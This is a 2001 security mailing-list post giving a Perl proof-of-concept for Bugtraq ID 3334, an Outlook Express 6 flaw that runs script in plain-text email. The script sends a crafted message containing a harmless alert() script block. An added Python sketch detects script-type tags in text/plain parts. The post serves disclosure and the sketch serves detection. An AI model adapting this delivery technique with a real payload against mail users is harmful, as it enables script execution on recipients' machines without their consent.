Proof-Of-Concept Perl Script for Bugtraq-ID: #3334

From: Mario Schmidt (infoat_private)
Date: Sat Sep 15 2001 - 11:17:22 PDT


    Saturday, September 15, 2001
    
    Following is a Proof-Of-Concept script, written in Perl, for the
    Bugtraq-ID: #3334 security issue, named "Microsoft Outlook Express 6
    Plain Text Message Script Execution". Credit for this issue goes to
    http-equivat_private [mailto:http-equivat_private], who originally
    found this bug.
    
    Usage of this script is very simple. Edit the Perl script, add your
    favourite SMTP mail host and your e-mail address as the program
    parameters, and finally execute it.
    
    The script is available for download as bug3334.pl
    [http://pcfon.de/ms.security/bug3334.pl].
    
    #!/usr/local/bin/perl
    #
    # bug3334.pl
    #
    # ms.security
    #
    # Microsoft Outlook Express 6
    # Plain Text Message Script Execution
    #
    # Proof-Of-Concept Perl Script
    #
    # Version: [0.0.1]
    # Last Edit: [2001-09-15]
    # Coding: ms.security [infoat_private]
    #
    # Bugtraq: #3334 [http://www.securityfocus.com/bid/3334]
    # Credit: http-equivat_private [http-equivat_private]
    #
    
    use Net::SMTP;                          # smtp mailer
    
    # *** Program parameter ***
    
    $mailer='mailhost';                     # smtp host
    $to='your@e-mail.com';                  # receiver address
    
    # *** Program information ***
    
    @info=
    (
      "\nms.security\n\n",
      "Microsoft Outlook Express 6\n",
      "Plain Text Message Script Execution\n\n",
      "Proof-Of-Concept Perl Script\n\n",
      "Version: [0.0.1]\n",
      "Last Edit: [2001-09-15]\n",
      "Coding: ms.security [info\@pcfon.de]\n\n",
      "Bugtraq: #3334 [http://www.securityfocus.com/bid/3334]\n",
      "Credit: http-equiv\@excite.com [http-equiv\@excite.com]\n\n"
    );
    
    # *** Message header ***
    
    @header=
    (
      'To: ',$to,"\n",
      "MIME-Version: 1.0\n",
      "Content-Type: text/plain\n",
      "charset=\"Windows-1252\"\n",
      "Content-Transfer-Encoding: 7bit\n",
      "X-Priority: 3\n",
      "X-MSMail-Priority: Normal\n",
      "X-Mailer: Microsoft Outlook Express 6.00.2600.0000\n",
      "X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000\n",
      "\n"
    );
    
    # *** JavaScript code ***
    
    @script=
    (
      "<script>",
      "alert(\"freak\");",
      "alert(\"show\")",
      "</script>"
    );
    
    # *** Mail message via smtp mailer ***
    
    print @info;                            # info message
    print "Connecting to $mailer ...\n";    # debug message
    $smtp = Net::SMTP->new($mailer);        # smtp constructor
    $smtp->mail($to);                       # mail method
    $smtp->to($to);                         # to method
    print "Sending messaging to $to ...\n"; # debug message
    $smtp->data();                          # begin of data
    $smtp->datasend(@header);               # message header
    $smtp->datasend(@script);               # script code
    $smtp->dataend();                       # end of data
    $smtp->quit;                            # terminate smtp
    print "Done.\n";                        # debug message
    
    # (c) 2001, ms.security, Germany. All rights reserved.
    
    ms.security
    M. Schmidt 
    
    Web: http://pcfon.de/ms.security/
    Mail: mailto:infoat_private
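
The condition this proof of concept depends on, a text/plain message body that contains a script block, can be checked at a mail gateway or during triage. The Python sketch below is an added example and not part of the original post; the function name, the tag list (which goes slightly beyond the `<script>` element used in the post) and the sample messages are assumptions constructed for illustration.

```python
import re
from email import message_from_string

# Tags that have no business being interpreted in a text/plain part (assumed list).
ACTIVE_MARKUP = re.compile(r"<\s*/?\s*(?:script|iframe|object|embed)\b", re.I)


def flag_plain_text_script(raw_message):
    """Return (part_index, matched_text) for each active tag found in a text/plain part."""
    findings = []
    for index, part in enumerate(message_from_string(raw_message).walk()):
        # A part with no Content-Type header defaults to text/plain.
        if part.get_content_type() != "text/plain":
            continue
        # decode=True undoes base64 / quoted-printable transfer encodings.
        payload = part.get_payload(decode=True) or b""
        charset = part.get_content_charset() or "latin-1"
        try:
            text = payload.decode(charset, errors="replace")
        except LookupError:  # unknown charset label
            text = payload.decode("latin-1")
        findings.extend((index, m.group(0)) for m in ACTIVE_MARKUP.finditer(text))
    return findings


# Constructed sample: plain-text mail carrying a script block, modelled on the post.
SUSPECT = (
    "To: user@example.com\n"
    "MIME-Version: 1.0\n"
    'Content-Type: text/plain; charset="Windows-1252"\n'
    "Content-Transfer-Encoding: 7bit\n"
    "\n"
    '<script>alert("freak");alert("show")</script>\n'
)

# Constructed sample: ordinary plain text that mentions "script" and uses "<".
BENIGN = (
    "To: user@example.com\n"
    "Content-Type: text/plain\n"
    "\n"
    "Meeting moved to 3 pm; if a < b then script the rollout.\n"
)

if __name__ == "__main__":
    for name, raw in (("SUSPECT", SUSPECT), ("BENIGN", BENIGN)):
        print(name, flag_plain_text_script(raw))
```

A non-empty result means the message should be quarantined or delivered with markup neutralised; text/html parts are deliberately left to whatever HTML sanitising policy the gateway already applies.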
    


